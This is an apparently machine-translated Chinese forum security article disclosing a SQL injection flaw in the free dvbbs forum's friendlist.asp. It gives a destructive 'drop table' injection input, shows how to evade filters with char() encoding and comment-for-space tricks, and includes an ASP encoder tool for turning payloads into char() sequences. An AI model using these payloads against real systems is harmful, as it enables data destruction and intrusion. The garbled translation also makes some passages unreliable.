Another vulnerability in the free version of dvbbs

Another vulnerability in the free version of dvbbs

Author: N. E. V. E. R Source: www.safechina.net

Forum Login Name: N. E. V. E. R
Submitted by email address: N.E.V.E.R@tom.com
Submitted QQ number: 1143431
Title: another type of vulnerability in the free version of dvbbs
Copyright: The article belongs to the Chinese safety network Co., http://www.safechina.net. and the author of the joint ownership, reprint please indicate the source !!
Content:
A lot of prawns have already played a strong dose on the free version of the dynamic network forum. I found that there may be another type of vulnerabilities that have escaped the eyes of the prawns, so I came up with an ugly look. Hehe, write in a hurry, if there is a mistake please correct, my mailbox is n.e.v.e.r@tom.com. Well, I have read the commercial registration version of dvbbs, but it is not easy to use.
Take the friendlist. asp function delfriend () in the online forum as an example.

Delid = Replace (request. Form ("ID "),"'","")
If delid = "" Or isnull (delid) then
Errmsg = errmsg + "<li>" + "select related parameters. "
Founderr = true
Exit sub
Else
Conn.exe cute ("delete from friend where f_username = '" & trim (membername) & "' and f_id in (" & delid &")")
Sucmsg = sucmsg +"
"+" <Li> <B> you have deleted the selected friend record. "
Call dvbbs_suc ()
End if

This filter is strictly incorrect. SQL injection can be performed without the same filter.
I think it's about the classic 1 'or '1' = '1 that blinded many people's eyes. The statement is like this.

"Select * from user where user = '" & user & "' And .........

I have no way to represent user = 'and' in front of and in different colors. Here we have to use 1 and 2 to represent them. In fact, the SQL Injection here is not simple because 'can appear in the user, but because' appears in the user, so that 1 and 2 cannot be correctly matched according to the author's meaning. Filtering out 'in the user can solve this problem perfectly, so replace (user, "'", "") is wonderful and incisive here.
However, the owner of the mobile network misinterpreted the Dharma and looked at the question in the second half:

... F_id in ("& delid &")"

The matching brackets are left and right! It is silly to filter out the 'from delid, because this filtering method cannot ensure the correct matching of the two expected parentheses of the author and can hardly block malicious attackers. Let's look at a possible attack method.

Delid =...); drop table [user]; --

This commit Can Escape filtering, but after SQL injection is completed, the table user will be deleted successfully.
Some days ago, when I was talking with Nanyang rock ice, I just thought that this injection method could modify some integer data, later, when I turned over the relevant msdn materials, I suddenly found that the use effect was not necessarily the same.
One way is to use the char function and the link character +, which I did in the query Analyzer:

Select * From sysusers where left (name, 2) = char (100) + char (98)

The returned results are all system user columns starting with DB, which is equivalent to the following query:

Select * From sysusers where left (name, 2) = 'db'

I posted an encode in "New Mobile Network Vulnerabilities and intrusions. ASP is used in this way. I will post it again here to catch up with the paper, so I am in a hurry. If you have a license, please send me a copy.

====================================== Cut here ======================== ==========
<HTML>
<Body bgcolor = Black>
<Font size = 2 color = # ff7777> Fill in the SQL statement! </Font>
<Form action = "<% = request. servervariables (" url ") %>" method = "Post">
<Input type = text name = "in" size = 45 value = "" style = "color: # 0099ff; border-bottom: # 0099ff 1px solid; border-left: # 0099ff 1px solid; border-Right: # 0099ff 1px solid; border-top: # 0099ff 1px solid; font-size: 9pt; Background-color: #000000 ">
<Input type = submit value = "encode! "Style =" font-size: 9pt; border-Right: 0px solid; border-top: 0px solid; border-left: 0px solid; border-bottom: 0px solid; background-color: # 0099ff; color: # ff0000; ">
</Form>

<Font color = # 0099ff>
<%
Link_char = "+" 'is the string Connection Symbol +?
Strin = request ("in ")
Strin = strin &"--"
Strtemp = Split (strin ,"'")
I = 0
'On error resume next
Do while not isnull (strtemp (I ))
If instr (strtemp (I), "--") then
Exit do
End if
I = I + 2
Loop
'Response. Write I
For J = 0 to I-1 step 2
Strout = Strout & strtemp (j)
For k = 0 to Len (strtemp (J + 1)-1
Strout = Strout & "char (" & ASC (left (right (strtemp (J + 1), Len (strtemp (J + 1)-K), 1 )) & ")" & link_char
Next
Strout = left (Strout, Len (Strout)-len (link_char ))
Next
If instr (strtemp (I), "--") <> 0 then
Strout = Strout & left (strtemp (I), instr (strtemp (I), "--")-1)
End if
Response. Write Strout
%>
====================================== Cut here ======================== ==========

If + is filtered out in this area, it is still possible, but the method is much more complicated. Here we only provide an example, or the above query statement, which is not used here.

Select * From sysusers where left (name, 2) = stuff (replicate (char (100), 2), 2, 1, char (98 ))

The results are the same. A little more strict, not even Spaces

Select/**/*/**/from/**/sysusers/**/where/**/left (name, 2) = stuff (replicate (char (100), 2), 2, 1, char (98 ))

However, this method requires too much content to be submitted as an SQL injection, and the get method can submit up to 1024 bytes of content, which may not be enough, so we have to use the post method, although it will be a lot of trouble. During the test, I found that these two methods are only valid for simple select/delete/update/insert/exec methods. When OpenRowSet is used, an error occurs. I am still testing. I hope you can give me some advice to avoid detours.

Writing this article, I think there are issues with the script, all of which can be attributed to the pairing problem. SQL injection is the same as cross-site scripting attacks. For cross-site scripting attacks, it can also be considered that HTML tags are not correctly matched. However, due to the random Syntax of HTML, generally, you do not need to close the previous SQL query statement exactly like SQL injection. The results of various script attacks are similar. The results of SQL injection are free to use the SQL query language. The results of cross-site scripting attacks are free to use HTML. If we regard HTML as a language, we can also see that as long as it is a language that dynamically produces another language, there will be a new type of vulnerability, at the beginning, it was SQL Injection-this was generated by VBScript when an SQL query statement was generated, and then a cross-site scripting attack-this was generated by VBScript When HTML was generated. What about later? In the future, if I want to create new types of scripts, it is estimated that they will not leave this circle, for example, when VBScript generates XML, and so on.

Let's look back at the dynamic network forum. If they don't get stuck with the filtering issue from the very beginning, but use pairing as the evaluation criteria, which of the following problems will happen.